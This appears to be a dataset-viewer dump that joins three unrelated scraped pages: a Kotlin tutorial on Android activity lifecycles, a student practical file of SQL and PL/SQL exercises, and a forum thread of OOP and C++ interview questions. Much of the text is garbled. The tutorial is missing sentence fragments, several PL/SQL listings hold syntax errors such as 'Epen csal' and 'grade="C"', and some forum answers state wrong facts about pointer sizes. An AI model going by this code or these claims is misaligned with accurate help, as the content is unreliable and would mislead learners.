text
stringlengths
20
1.01M
url
stringlengths
14
1.25k
dump
stringlengths
9
15
lang
stringclasses
4 values
source
stringclasses
4 values
Introduction to Android Activities with Kotlin Update Note: This tutorial has been updated to Kotlin and Android Studio 3.0 by Joe Howard. The original tutorial was written by Namrata Bandekar. When you make an Android app, it’s pretty likely that the first thing you’ll do is plot and plan how you’ll take over the world. Just kidding. Actually, the first thing you do is create an Activity. Activities. In addition, you’ll use the (newly official) Kotlin programming language and Android Studio 3.0. You’ll need to use Kotlin 1.1.3 or later and Android Studio 3.0 Canary 5 or later. This tutorial assumes you’re familiar with the basics of Android development. If you’re completely new to Kotlin, XML or Android Studio, you should take a look at the Beginning Android Development Series and Kotlin For Android: An Introduction before you start. Getting Started Download and extract the starter project for this tutorial. Open Android Studio 3.0 or later, and choose Open an existing Android Studio project. Then select the project you just extracted. mission is to liven up this screen by making the to-do list modifiable.(): Called by the OS when the activity is first created. This is(). In here, you generally should start UI animations, audio based content or anything else that requires the activity’s contents to be on screen. - onResume(): As an activity enters the foreground, this method is called. Here you have a good place to restart animations, update UI elements, restart camera previews, resume audio/video playback or initialize any components that you release during onPause(). - onPause(): This method is called before sliding into the background. Here you should stop any visuals or audio associated with the activity such as UI animations, music playback or the camera. This method is followed by onResume()if the activity returns to the foreground or by onStop()if it becomes hidden. - onStop(): This method is called right after onPause(), when the activity is no longer visible to the user, and it’s a good place to save data that you want to commit to the disk. It’s followed by either onRestart(), if this activity is coming back to the foreground, or onDestroy()if it’s being released from memory. - onRestart(): Called after stopping an activity, but just before starting it again. It’s always followed by onStart(). - onDestroy(): This is the final callback you’ll receive from the OS before the activity is destroyed. You can trigger an activity’s desctruction by calling finish(), or it can be triggered by the system when the system needs to recoup memory. If your activity includes any background threads or other long-running resources, destruction could lead to a memory leak if they’re not released, so you need to remember to stop these processes here as well. Note: You do not call any of the above callback methods directly in your own code (other than superclass invocations) — you only override them as needed in your activity subclasses. They are called by the OS when a user opens, hides or exits the activity. So many methods to remember! In the next section, you’ll see some of these lifecycle methods in action, and then it’ll be a lot easier to remember what everything does. Configuring an Activity Keeping the activity lifecycle in mind, take a look at an activity in the sample project. Open MainActivity.kt, and you’ll see that the class with its onCreate() override looks like this: class MainActivity : AppCompatActivity() { // 1 private val taskList: MutableList<String> = mutableListOf() private val adapter by lazy { makeAdapter(taskList) } override fun onCreate(savedInstanceState: Bundle?) { // 2 super.onCreate(savedInstanceState) // 3 setContentView(R.layout.activity_main) // 4 taskListView.adapter = adapter // 5 taskListView.onItemClickListener = AdapterView.OnItemClickListener { parent, view, position, id -> } } // 6 fun addTaskClicked(view: View) { } // 7 private fun makeAdapter(list: List<String>): ArrayAdapter<String> = ArrayAdapter(this, android.R.layout.simple_list_item_1, list) } Here’s a play-by-play of what’s happening above: - You initialize the activity’s properties, which include an empty mutable list of tasks and an adapter initialized using by lazy. - You call onCreate()on the superclass — remember that this is (usually) the first thing you should do in a callback method. There are some advanced cases in which you may call code prior to calling the superclass. - You set the content view of your activity with the corresponding layout file resource. - Here you set up the adapter for taskListView. The reference to taskListViewis initialized using Kotlin Android Extensions, on which you can find more info here. This replaces findViewById()calls and the need for other view-binding libraries. - You add an empty OnItemClickListener()to the ListViewto capture the user’s taps on individual list entries. The listener is a Kotlin lambda. - An empty on-click method for the “ADD A TASK” button, designated by the activity_main.xml layout. - A private function that initializes the adapter for the list view. Here you are using the Kotlin = syntax for a single-expression function. Note: To learn more about ListViews and Adapters, refer to the Android Developer docs. Your implementation follows the theory in the previous section — you’re doing the layout, adapter and click listener initialization for your activity during creation. Starting an Activity In its current state, the app is a fairly useless lump of ones and zeros because you can’t add anything to the to-do list. You have the power to change that, and that’s exactly what you’ll do next. In the MainActivity.kt file you have open, add a property to the top of the class: private val ADD_TASK_REQUEST = 1 You’ll use this immutable value to reference your request to add new tasks later on. Then add this import statement at the top of the file: import android.content.Intent And add the following implementation for addTaskClicked(): val intent = Intent(this, TaskDescriptionActivity::class.java) startActivityForResult(intent, ADD_TASK_REQUEST) When the user taps the “ADD A TASK” button, the Android OS calls addTaskClicked(). Here you create an Intent to launch the TaskDescriptionActivity from MainActivity. Note: There will be a compile error since you have yet to define TaskDescriptionActivity. You can start an activity with either startActivity() or startActivityForResult(). They are similar except that startActivityForResult() will result in onActivityResult() being called once the TaskDescriptionActivity finishes. You’ll implement this callback later so you can know if there is a new task to add to your list or not. But first, you need a way to enter new tasks in Forget Me Not — you’ll do so by creating the TaskDescriptionActivity. Note: Intents are used to start activities and pass data between them. For more information, check out the Android: Intents Tutorial Creating an Activity Android Studio makes it very easy to create an activity. Just right-click on the package where you want to add the activity — in this case, the package is com.raywenderlich.android.forgetmenot. Then navigate to New\Activity, and choose Empty Activity, which is a basic template for an activity: On the next screen, enter TaskDescriptionActivity as the Activity Name and Android Studio will automatically fill the other fields based on that. Click Finish and put your hands in the air to celebrate. You’ve just created your first activity! Android Studio will automatically generate the corresponding resources needed to create the activity. These are: - Class: The class file is named TaskDescriptionActivity.kt. This is where you implement the activity’s behavior. This class must subclass the Activity class or an existing subclass of it, such as AppCompatActivity. - Layout: The layout file is located under res/layout/and named activity_task_description.xml. It defines the placement of different UI elements on the screen when the activity is created. The layout file created from the Empty Activity template in Android Studio 3.0 defaults to using a ConstraintLayout for the root view group. For more information on ConstraintLayout, please see the android developer docs here. In addition to this, you will see a new addition to your app’s AndroidManifest.xml file: <activity android:</activity> relative to the app package (hence the period at the beginning). Now build and run the app. When you tap on ADD A TASK, you’re presented with your newly generated activity! Looking good, except for the fact that it’s lacking substance. Now for a quick remedy to that! In your newly generated TaskDescriptionActivity, paste the following into your class file, overwriting anything else except the class declaration and its brackets. // 1 companion object { val EXTRA_TASK_DESCRIPTION = "task" } // 2 override fun onCreate(savedInstanceState: Bundle?) { super.onCreate(savedInstanceState) setContentView(R.layout.activity_task_description) } // 3 fun doneClicked(view: View) { } Note: You can quickly fix any missing imports that Android Studio complains about by placing your cursor on the item and pressing Option-Enter. Here, you’ve accomplished the following: - Used the Kotlin companion object for the class to define attributes common across the class, similar to static members in Java. - Overriden the onCreate()lifecycle method to set the content view for the activity from the layout file. - Added an empty click handler that will be used to finish the activity. Jump over to your associated layout in res/layout/activity_task_description.xml and replace everything with the following: <?xml version="1.0" encoding="utf-8"?> <android.support.constraint.ConstraintLayout xmlns: <TextView android: <EditText android: <Button android: </android.support.constraint.ConstraintLayout> Here you change the layout so there is a TextView prompting for a task description, an EditText for the user to input the description, and a Done button to save the new task. Run the app again, tap ADD A TASK and your new screen will look a lot more interesting. Stopping an Activity Just as important as starting an activity with all the right methods is properly stopping it. In TaskDescriptionActivity.kt, add these imports, including one for Kotlin Android Extensions: import android.app.Activity import android.content.Intent import kotlinx.android.synthetic.main.activity_task_description.* Then add the following to doneClicked(), which is called when the Done button is tapped in this activity: // 1 val taskDescription = descriptionText.text.toString() if (!taskDescription.isEmpty()) { // 2 val result = Intent() result.putExtra(EXTRA_TASK_DESCRIPTION, taskDescription) setResult(Activity.RESULT_OK, result) } else { // 3 setResult(Activity.RESULT_CANCELED) } // 4 finish() You can see a few things are happening here: - You retrieve the task description from the descriptionText EditText, where Kotlin Android Extensions has again been used to get references to view fields. - You create a result Intentto pass back to MainActivityif the task description retrieved in step one is not empty. Then you bundle the task description with the intent and set the activity result to RESULT_OK, indicating that the user successfully entered a task. - If the user has not entered a task description, you set the activity result to RESULT_CANCELED. - Here you close the activity. Once you call finish() in step four, the callback onActivityResult() will be called in MainActivity — in turn, you need to add the task to the to-do list. Add the following method to MainActivity.kt, right after onCreate(): override fun onActivityResult(requestCode: Int, resultCode: Int, data: Intent?) { // 1 if (requestCode == ADD_TASK_REQUEST) { // 2 if (resultCode == Activity.RESULT_OK) { // 3 val task = data?.getStringExtra(TaskDescriptionActivity.EXTRA_TASK_DESCRIPTION) task?.let { taskList.add(task) // 4 adapter.notifyDataSetChanged() } } } } Let’s take this step-by-step: - You check the requestCodeto ensure the activity result is indeed for your add task request you started with TaskDescriptionActivity. - You make sure the resultCodeis RESULT_OK— the standard activity result for a successful operation. - Here you extract the task description from the result intent and, after a null check with the letfunction,, tap ADD A TASK. This will bring up a new screen that lets you enter a task. Now add a description and tap Done. The screen will close and the new task will be on your list: Registering Broadcast Receivers Every to-do list needs to have a good grasp on date and time, so a time display should be the next thing you add to your app. Open MainActivity.kt and add the following after the existing property declarations at the top: private val tickReceiver by lazy { makeBroadcastReceiver() } Then add a companion object near the top of MainActivity: companion object { private const val LOG_TAG = "MainActivityLog" private fun getCurrentTimeStamp(): String { val simpleDateFormat = SimpleDateFormat("yyyy-MM-dd HH:mm", Locale.US) val now = Date() return simpleDateFormat.format(now) } } And initialize the tickReceiver by adding the following to the bottom of MainActivity: private fun makeBroadcastReceiver(): BroadcastReceiver { return object : BroadcastReceiver() { override fun onReceive(context: Context, intent: Intent?) { if (intent?.action == Intent.ACTION_TIME_TICK) { dateTimeTextView.text = getCurrentTimeStamp() } } } } Here, you create a BroadcastReceiver that sets the date and time on the screen if it receives a time change broadcast from the system. You use getCurrentTimeStamp(), which is a utility method in your activity, to format the current date and time. Note: If you’re not familiar with BroadcastReceivers, you should refer to the Android Developer documentation. Next add the following methods to MainActivity underneath onCreate() override fun onResume() { // 1 super.onResume() // 2 dateTimeTextView.text = getCurrentTimeStamp() // 3 registerReceiver(tickReceiver, IntentFilter(Intent.ACTION_TIME_TICK)) } override fun onPause() { // 4 super.onPause() // 5 try { unregisterReceiver(tickReceiver) } catch (e: IllegalArgumentException) { Log.e(MainActivity.LOG_TAG, "Time tick Receiver not registered", e) } } Here you do a few things: - You call onResume()on the superclass. - You update the date and time TextViewwith the current time stamp, because the broadcast receiver is not currently registered. - You then register the broadcast receiver in onResume(). This ensures it will receive the broadcasts for ACTION_TIME_TICK. These are sent every minute after the time changes. - In onPause(), you first call onPause()on the superclass. - You then unregister the broadcast receiver in onPause(), so the activity no longer receives the time change broadcasts while paused.. - Tap ADD A TASK. - Enter “Replace regular with decaf in the breakroom” as the task description and tap Done. You’ll see your new task in the list. - Close the app from the recent apps. - Open the app again. You can see that it forgot about your evil plans. Persisting Data Between Launches Open MainActivity.kt, and add the following properties to the top of the class: private val PREFS_TASKS = "prefs_tasks" private val KEY_TASKS_LIST = "tasks_list" And add the following underneath the rest of your activity lifecycle methods. override fun onStop() { super.onStop() // Save all data which you want to persist. val savedList = StringBuilder() for (task in taskList) { savedList.append(task) savedList.append(",") } getSharedPreferences(PREFS_TASKS, Context.MODE_PRIVATE).edit() .putString(KEY_TASKS_LIST, savedList.toString()).apply() } Here you build a comma separated string with all the task descriptions in your list, and then you save the string to SharedPreferences in the onStop() callback. As mentioned earlier, onStop() is a good place to save data that you want to persist across app uses. Next add the following to onCreate() below the existing initialization code: val savedList = getSharedPreferences(PREFS_TASKS, Context.MODE_PRIVATE).getString(KEY_TASKS_LIST, null) if (savedList != null) { val items = savedList.split(",".toRegex()).dropLastWhile { it.isEmpty() }.toTypedArray() taskList.addAll(items) } Here you read the saved list from the SharedPreferences and initialize taskList by converting the retrieved comma separated string to a typed array. Note:. Still in MainActivity.kt, at the bottom of the class add: private fun taskSelected(position: Int) { // 1 AlertDialog.Builder(this) // 2 .setTitle(R.string.alert_title) // 3 .setMessage(taskList[position]) .setPositiveButton(R.string.delete, { _, _ -> taskList.removeAt(position) adapter.notifyDataSetChanged() }) .setNegativeButton(R.string.cancel, { dialog, _ -> dialog.cancel() }) // 4 .create() // 5 .show() }. - You display the alert dialog to the user. Update the OnItemClickListener of the taskListView in onCreate(): taskListView.onItemClickListener = AdapterView.OnItemClickListener { _, _, position, _ -> taskSelected(position) } Your app won’t compile though until you define some strings. configure the strings, open res/values/strings.xml and within the resources element add: <string name="alert_title">Task</string> <string name="delete">Delete</string> <string name="cancel">Cancel</string> Build and run the app. Tap on one of the tasks. You’ll see an alert dialog with options to CANCEL or DELETE the task from the list: Now try rotating the device. (Make sure you have rotation in the device settings set to auto-rotate.) As soon as you rotate the device, the alert dialog is dismissed. This makes for an unreliable, undesirable user experience — users don’t like it when things just vanish from their screen without reason. as follows. In AndroidManifest.xml, find the start tag: <activity android: And change it to: <activity android: Here, you declare that your MainActivity will handle any configuration changes that arise from a change in orientation or screen size. This simple line prevents a restart of your activity by the system, and it passes the work to MainActivity. You can then handle these configuration changes by implementing onConfigurationChanged(). In MainActivity.kt, add the following method after onStop(): override fun onConfigurationChanged(newConfig: Configuration?) { super.onConfigurationChanged(newConfig) } Here you’re just calling the superclass’s onConfigurationChanged() method since you’re not updating or resetting any elements based on screen rotation or size. onConfigurationChanged() is passed a Configuration object that contains the updated device configuration. By reading fields in this newConfig, you can determine the new configuration and make appropriate changes to update the resources used in your interface. Now, build and run the app and rotate the device again. This time, implement lifecycle. You covered quite a few concepts, including: - How to create an activity - How to stop an activity - How to persist data when an activity stops - How to work around a configuration change! Team Each tutorial at is created by a team of dedicated developers so that it meets our high quality standards. The team members who worked on this tutorial are: - Author Joe Howard - Author Namrata Bandekar - Tech Editor Kyle Gorlick - Final Pass Editor Matt Luedke
https://www.raywenderlich.com/165824/introduction-android-activities-kotlin
CC-MAIN-2018-13
en
refinedweb
Are you sure? This action might not be possible to undo. Are you sure you want to continue? Submitted To Submitted By Er. Gunjan Oberoi (Deptt. Of CSE ) Nitish Kamal D3 CSE (A2) 95065/90370305200 1 2 INDEX S.no 01 02 03 04 05 06 07 08 09(a) 09(b) Name of Practical To Execute Various Queries Using Commands Of Sql To Use A Loop In Sql To Find Out The Area Of A Circle When Radius Is Given Introduction To Views Program To Create And Drop An Index Introduction To Packages Introduction To Triggers Write A Program To Find Salary Grade Using Cursor Create Or Replace Procedure My_Proc As Create Table Mytable (Num_Col Number, Char_Col Varchar2(60)); P.no 02 19 21 23 28 31 33 35 37 38 3 PRACTICAL NO. 1 TO EXECUTE VARIOUS QUERIES USING COMMANDS OF SQL (1) To create an employee table with the fields- employee name , department name, salary. You must create your tables before you can enter data into them. Use the Create Table command. Syntax: Create table tablename using filename (fieldname fieldtype(length), fieldname fieldtype(length), fieldname fieldtype(length)); 4 the ALTER TABLE syntax is: ALTER TABLE table_name ADD column_name column-definition. modify. 5 .(2) To add the following fields to the employee table: employee number. date of birth. phone number. It can also be used to add. or drop a column from an existing table. The ALTER TABLE statement allows you to rename an existing table. To add a column to an existing table. You can use the modify SQL command if you need to resize a column in MySQL. example: alter table people modify name VARCHAR(35) . It is written as: alter table modify [column name] VARCHAR(5) . By doing this you can allow more or less characters than before.(3) To modify the width of the field in employee table. 6 . This changes the column called "name" on the table called "people" to now allow 35 characters. '10/10/2005') When using SQL INSERT INTO you might not want to enter values for all columns and in this case you have to specify the list of columns you are entering values for. 20. Here is how you can insert a new row into the Weather table. 20. AverageTemperature. with a slightly modified SQL INSERT INTO syntax: INSERT INTO Weather VALUES ('Los Angeles'. The SQL INSERT INTO clause facilitates the process of inserting data into a SQL table.(4) To insert the values in employee table. '10/10/2005') You can produce the same result. If you do not enter values 7 . using SQL INSERT INTO: INSERT INTO Weather (City. Date) VALUES ('Los Angeles'. The following SQL INSERT example enters only 2 of the 3 columns in the Weather table: INSERT INTO Weather (City.for all columns. we can also insert a bulk of data into d tables by specifying the columns of the table and creating an input interface like the following: 8 . Instead of using insert into command again and again. '10/10/2005') (5) To insert various records into employee table without repeating insert command. Date) VALUES ('Boston'. then the columns you have omitted must allow NULL values or at least have a default value defined. And the data values inserted there will be inserted into the table as below: (6) To update the records into employees table where employee name is “neha” 9 . … (7) To increase the salary of all the employees by Rs. 10 . Column2 = Value2.12000. The SQL UPDATE clause basic syntax looks like this: UPDATE Table1 SET Column1 = Value1.The SQL UPDATE clause serves to update data in database table. Hence the querry that will use will execute will raise the salary of all the employees in equal amount. the amount is raised by Rs.The salary of the employees in tha table can be increased by adding the equal amount to the salary column of each employee. 11 . 12000 and the corresponding changes are shown by again showing all the contents of the table. (8) To delete a particular record from employees table. Here in this particular querry. 12 .The SQL DELETE clause is used to delete data from a database table. The simplest SQL DELETE syntax looks like this: DELETE FROM Table1 The SQL DELETE statement above will delete all data from the Table1 table. Most of the time we will want to delete only table rows satisfying certain search criteria defined in the SQL WHERE clause. 13 .(9) To delete all the records from employee table. that means the query will delete all the data from the table. Hence this statement will delete all the data contained in the table. we can do that. it will not be deleted. But the structure f the table will remain stored . In the case we want to again enter the data values in the same table. but the structure will still remain preserved in the database. The delete command will delete the columns in the table. Here we use delete employees. as we can use the DROP TABLE command. Fortunately. it would be problematic if we cannot do so because this could create a maintenance nightmare for the DBA's.(10) To drop the employee table. The syntax for DROP TABLE is DROP TABLE "table_name" So. In fact. if we wanted to drop the table called customer that we created in the CREATE TABLE section. we simply type DROP TABLE customer. 14 . Sometimes we may decide that we need to get rid of a table in the database for some reason. SQL allows us to do it. After we have dropped the table. the query will give an error saying that the table doesn’t exist. so if we will perform any transaction on deleted table. the data as well as the structure of the table is deleted.(11) To view all the records of employee table.. 15 . After the command returns. 16 . Changes that have not been moved to the table are not committed. whether they were made through Oracle OLAP or through another form of access (such as SQL) to the database. The COMMIT command only affects changes in workspaces that you have attached in read/write access mode. The COMMIT command executes a SQL COMMIT command. UPDATE moves changes from a temporary work area to the database table in which the workspace is stored. then you must first update the workspace using the UPDATE command.(12) To make changes permanent to the database. all committed changes are visible to other users who subsequently attach the workspace. When you want changes that you have made in a workspace to be committed when you execute the COMMIT command. All changes made in your database session are committed. 17 .(13) To undo the uncommitted change in the database. The ROLLBACK aborts the current transaction. (14) To give access rights to a user on a particular database. Syntax ROLLBACK [WORK] Description ROLLBACK rolls back the current transaction and causes all the updates made by the transaction to be discarded. WORK has no special sense and is supported for compatibility with SQL standards only. 18 . Here's the syntax of the statement: GRANT <permissions> [ON <table>] TO <user/role> [WITH GRANT OPTION] (15) To take rights from a user on a table. it's time to begin strengthening security by adding permissions. We'll accomplish this through the use of the SQL GRANT statement. Our first step will be to grant appropriate database permissions to our users.Once we've added users to our database. it often proves necessary to revoke them at a later date. Here's the syntax: REVOKE [GRANT OPTION FOR] <permissions> ON <table> FROM <user/role> (16) To add not null constraint on the salary column of the table. Fortunately. SQL provides us with the REVOKE command to remove previously granted permissions. 19 .Once we've granted permissions. The NOT NULL constraint enforces a column to NOT accept NULL values. a table column can hold NULL values. or update a record without adding a value to this field. 20 .By default. This means that you cannot insert a new record. The NOT NULL constraint enforces a field to always contain a value. 2 21 . PRACTICAL NO.Now whenever we try to leave the coloumn where not null constraint is applied. put_line(‘loop exited as the value of I has reached ‘ || to_char(i)). end.TO USE A LOOP IN SQL Declare i number :=0 . Begin Loop i:=i+2. exit when i>10. Output:- 22 . end loop. dbms_output. 3 23 .PRACTICAL NO. 14. begin radius :=3. radius number(5).2) := 3. end.2). end loop.TO FIND OUT THE AREA OF A CIRCLE WHEN RADIUS IS GIVEN create table areas(radius number(5). area number(14. Output: 24 .2)).2). declare pi constant number(4. area number(14.area). while radius<=7 loop area:=pi*power(radius. radius:= radius+1. insert into areas values(radius. PRACTICAL NO 4 25 . INTRODUCTION TO VIEWS VIEW:.acct_fd_no.’sb432’.A view is a virtual table which provides access to a subset of columns from one or more tables. Create a view: create view v_nominees as select nominee_no. The dynamic result of one or more relational operations operating on base relations to produce new relation. It is a query stored as an object in the database which does not have its own data.’ram’). Inserting values in a view: • insert into v_nominees values (‘n100’. 26 . A view is a list of columns or a series of records retrieved from one or more existing tables or as a combination of one or more views and one or more tables.name from from nominee_mstr. 27 .Displaying view: Updating values in view: • update v_nominees set name=’vaishali’ where name=’sharan’. deleting values from view:• delete from v_nominees where name=’vaishali’. 28 .Dropping view:drop view v_nominees. 29 . <column name2>). example: create index idxtransAcctno ON trans_mstr (trans_no. 30 . composite index: create index <index name> ON <table name> (<column name1>. example: create index idxveri Empno ON acct_mstr (veri_emp_no).PRACTICAL NO 5 PROGRAM TO CREATE AND DROP AN INDEX theory: there are two types of indexes: simple index and composite index simple index: create index <index name> ON <table name> (<column name>). acctNo). select <index name> from <cursor indexes> unique index: create unique index <index name> ON <table name> (<column name >. Function based index: Create index <index name> ON <table name> (<function> (<column name>)). <column name>). Example: create index idx_name ON cust_mstr (upper(fname)). Alter index <index name> rebuild no reverse. Dropping an index: Drop index<index name>. alter index: example: if reverse index re built into normal index. reverse key index: create index <index name> ON <table name> (<column name>) reverse. 31 . PRACTICAL NO 6 INTRODUCTION TO PACKAGES 32 . sal number. job varchar. sal. Name out varchar. Dno number) is Begin Insert into emp (empno. If SQL%Found Then Return (‘y’). amount number) Return number is N number. End retrieve. sal into name. deptno) values (Eno. Dno). End if. Procedure retrieve (Eno in number. 33 . End insert_oper.Create or replace package body operation as procedure insert_oper (Eno number. name varchar. sal out number) is Begin Select ename. ename. Begin Update emp set sal=sal + amount where deptno = Dno. name. Function update_oper( dno number. Else Return(‘n’). N:= SQL%RowCount. End update_oper. Return(N). Function Delete_oper (Eno number) return char is Begin Delete emp where empno=Eno. job. job. sal from emp where empno=Eno. sal. Output:- PRACTICAL NO 7 INTRODUCTION TO TRIGGERS 34 . End operation.End delete_oper. losal number(10).’salary’||to_char(:new.Ename). job_classification number(10)). End. Create table salgrade ( grade number(5). hisal number(10).job. If (:new.Program to explain the working of a trigger.job||’for employee’||:new. Maxsal number(10). job ON emp99 for each row Declare Minsal number(10).sal > maxsal) then Raise salary_out_of_range. Salary_out_of_range exception. Exception When salary_out_of_range then Raise_application_error(-20300. When no_data_found then Raise _application_error(-20322. Begin Select losal. maxsal from salgrade where job_classification =:new. 35 . hisal into minsal. Create or replace trigger salary_check Before insert or update of sal. Endif.’invalid job classification’||:new.sal)||’out of range for’||’job classification’||:new.sal < minsal or :new.job_classification). OUTPUT: PRACTICAL NO 8 Write a program to find salary grade using cursor Declare 36 . Esal emp. If Esal > 2500 and esal < 3500 then grade=”C”. Loop exit when csal%not found. esal.sal%type. Begin Epen csal. If Esal > 3500 and esal < 4500 then grade=”B”. sal from emp.Cursor csal is Select empno. 37 . Grade varchar(2). endif dbms_output. endif If Esal > 4500 and esal < 5500 then grade=”A”.empno% type. endif If Esal > 5500 then grade=”A+”. Fetch csal into eno.put_line(eno + ’has’ + grade + ’grade’). endif. Eno emp. OUTPUT:- PRACTICAL NO 9(a) CREATE OR REPLACE PROCEDURE MY_PROC AS begin dbms_output.put_line(‘hello world’). end. 38 .endloop. OUTPUT PRACTICAL NO 9 (b) CREATE TABLE MYTABLE (NUM_COL NUMBER. begin my_proc. create or replace procedure insertIntoTemp as v_num 1 number:=1. CHAR_COL VARCHAR2(60)). v_string1 varchar2(50):= ‘hello world!’. begin 39 .end my_proc. v_outputstr varchar2(50). end. OUTPUT:- 40 .put_line(v_output str). select char_col into v_output str from mytable where num_col=v_num1. end insertIntoTemp.insert into mytable(num_col. char_col) values (v_num1. v_string1). end. begin insertIntoTemp. dbms_output. 41 .
https://www.scribd.com/doc/85187889/Reference-Practicle-file-for-RDBMS-II
CC-MAIN-2018-13
en
refinedweb
I'm using Google App Engine and Django templates. I have a table that I want to display the objects look something like: Object Result: Items = [item1,item2] Users = [{name='username',item1=3,item2=4},..] <table> <tr align="center"> <th>user</th> {% for item in result.items %} <th>{{item}}</th> {% endfor %} </tr> {% for user in result.users %} <tr align="center"> <td>{{user.name}}</td> {% for item in result.items %} <td>{{ user.item }}</td> {% endfor %} </tr> {% endfor %} </table> I found a "nicer"/"better" solution for getting variables inside Its not the nicest way, but it works. You install a custom filter into django which gets the key of your dict as a parameter To make it work in google app-engine you need to add a file to your main directory, I called mine *django_hack.py* which contains this little piece of code from google.appengine.ext import webapp register = webapp.template.create_template_register() def hash(h,key): if key in h: return h[key] else: return None register.filter(hash) Now that we have this file, all we need to do is tell the app-engine to use it... we do that by adding this little line to your main file webapp.template.register_template_library('django_hack') and in your template view add this template instead of the usual code {{ user|hash:item }} And its should work perfectly =)
https://codedump.io/share/hP1ZTiVAldsA/1/django-templates-and-variable-attributes
CC-MAIN-2018-13
en
refinedweb
This is a C++ Program to solve a matching problem. Given N men and N women, where each person has ranked all members of the opposite sex in order of preference, marry the men and women together such that there are no two people of opposite sex who would both rather have each other than their current partners. If there are no such people, all the marriages are “stable”. Here is source code of the C++ Program to Solve a Matching Problem for a Given Specific Case. The C++ program is successfully compiled and run on a Linux system. The program output is also shown below. // C++ program for stable marriage problem #include <iostream> #include <string.h> #include <stdio.h> using namespace std; // Number of Men or Women #define N 4 // This function returns true if woman 'w' prefers man 'm1' over man 'm' bool wPrefersM1OverM(int prefer[2*N][N], int w, int m, int m1) { // Check if w prefers m over her current engagment m1 for (int i = 0; i < N; i++) { // If m1 comes before m in lisr of w, then w prefers her // cirrent engagement, don't do anything if (prefer[w][i] == m1) return true; // If m cmes before m1 in w's list, then free her current // engagement and engage her with m if (prefer[w][i] == m) return false; } } // Prints stable matching for N boys and N girls. Boys are numbered as 0 to // N-1. Girls are numbereed as N to 2N-1. void stableMarriage(int prefer[2*N][N]) { // Stores partner of women. This is our output array that // stores paing information. The value of wPartner[i] // indicates the partner assigned to woman N+i. Note that // the woman numbers between N and 2*N-1. The value -1 // indicates that (N+i)'th woman is free int wPartner[N]; // An array to store availability of men. If mFree[i] is // false, then man 'i' is free, otherwise engaged. bool mFree[N]; // Initialize all men and women as free memset(wPartner, -1, sizeof(wPartner)); memset(mFree, false, sizeof(mFree)); int freeCount = N; // While there are free men while (freeCount > 0) { // Pick the first free man (we could pick any) of preference is free, w and m become // partners (Note; } Output: $ g++ MatchingProblem.cpp $ a.out Woman Man 4 2 5 1 6 3 7 0 ------------------ (program exited with code: 0) Press return to continue Sanfoundry Global Education & Learning Series – 1000 C++ Programs. Here’s the list of Best Reference Books in C++ Programming, Data Structures and Algorithms.
https://www.sanfoundry.com/cpp-program-solve-matching-problem-given-specific-case3/
CC-MAIN-2018-13
en
refinedweb
What is the use/advantage of function overloading Please suggest use of FO Nandini - Mar 2nd, 2018 Code maintenance is easy supriya - May 24th, 2017 With the help of function loading we can use multiple function without declare again and again as per our requirement we can use our parameters in same function and call them from our subclasses. Difference between data encapsulation vs abstraction PRANIT PATIL - Nov 27th, 2017 Encapsulation and abstraction both solve same problem: Complexity; but in different dimensions. Abstraction: Hides the implementation details of your methods. Provides a base to variations in the app... tuba - Jun 10th, 2016 Abstraction is the method in which we write its coding in another class. In which we do not know how our function work example SMS in which we only send message we do not know how we send it or what m... How do you differentiate between a constructor and normal function? Sumit Payasi - Oct 2nd, 2017 Constructor is an special function, which has same name as class name, constructor is an automatic initialization of object. constructor should not have any return type. constructor must be invoked wi... udayakumar - Sep 28th, 2016 Method: 1) The method may or may not be present in the class 2) The method will be having the return type 3) The method is invoked with reference to object of the class Constructor: 1) If you write o... Compile Time Overloading What is the requirement of compile time overloading? Mamta - Sep 14th, 2017 Compile time overloading or static binding or early binding means to have same method name with different arguments. Example sample(int a) sample(int a, int b) sample(char a) sample(int a, char b) sample(int a, char b, string c) All of these are example of compile time overloading. Praveen - Jan 16th, 2012 We know that because of polymorphism, we can declare any number of function with change in signature. Signature considers three parts 1. No.of parameters 2. Type of parameters 3. Order of parameters... What is static identifier? Amit - Jun 21st, 2017 Variable declared as static in a function is initialized once, and retains its value between function calls. The default initial value of an uninitialized static variable is zero. yogeshpanda - Sep 21st, 2005 The static variables persist their values between the function calls and the static functions is out of the class scoop means it can be invoked without the use of the object( cab be invocked by classname::functionname). What does static variable mean? supriya - May 24th, 2017 Static variable is used with in class in anywhere. vignesh - Feb 10th, 2017 A function-scope or block-scope variable that is declared as static is visible only within that scope. Furthermore, static variables only have a single instance. In the case of function or block-scope... Explain the advantages of OOPs with the examples. nimesh diyora - Feb 11th, 2017 Code Reuse and Recycling: Objects created for Object Oriented Programs can easily be reused in other programs. Encapsulation (Part 1): Once an Object is created, knowledge of its implementation is no... sabari - Nov 18th, 2016 Code reuse Reduce lines of coding What is the similarity between a Structure, Union and enumeration? dhivyanatesh - Aug 19th, 2016 Structure and Union both allows us to group variables of mixed datatypes into a single entity. Resh - Jul 20th, 2016 All are helpful in defining new datatypes advantages of Object Oriented Modeling? Elizabeth - Jun 15th, 2016 Increase consistency between analysis design and programming or activities sripri - May 2nd, 2007 The advantage of object-oriented modeling is the fact that objects encapsulate state expressed by attributes and behavior specified methods or operation and they are able to communicate by sending and... What is near, far and huge pointers? How many bytes are occupied by them? PAWAN KUMAR TIWARI - Jun 12th, 2016 Near=2 far=4 huge=4 ankit_k7 - Dec 7th, 2007 Near pinter occupy 16 bytesnear and far occupy 32 bytes What are the different types of polymorphism? syedafarzana - Mar 31st, 2016 Compile time Polymorphysim and Runtime Polymorphism tux - Jul 4th, 2015 There are two types controlled and uncontrolled polymorphism. Overloading wont belong to type of polymorphism Overriding is tool to implement polymorphism. What is OOPS? OOP is the common abbreviation for Object-Oriented Programming. Read Best Answer Editorial / Best Answer Answered by: shahistha -. MD SADDAM HUSSAIN - Mar 22nd, 2016 OOPs. Object Oriented Programming is a paradigm that provides many concepts such as inheritance, data binding, polymorphism etc. pooja odhekar - Feb 28th, 2013 OOPS provides features like polymorphism, inheritance, abstraction. What is an Abstraction? Does the c supports abstraction?with example...and what is the diff. b/w abstraction and encapsulation? Samyuktha Reddy - Mar 22nd, 2016 Hiding the programming elements which are encapsulated. PRIYADHARSHINI - Mar 16th, 2016 Abstraction means Hiding Information Write a c++ program to accept three digits (i.e 0-9)and print all possible combinations fro these digits.(for exanple if the three digits are 1,2,3 then all possible combinations are 123,132,231,213,312,321 etc) Lineesh K Mohan - Mar 22nd, 2016 "cpp #include #include using namespace std; int main() { int arrNum[3] = {0}; int nTemp = 0; int nI = 0,nJ = 0,nK = 0; coutnTemp; ... adnan - Jan 13th, 2016 "cpp Yanesh Tyagi Dec 23rd, 2006 /* Program to write combination of 3 digit number Author : Rachit Tyagi Date : 23-Dec-2006 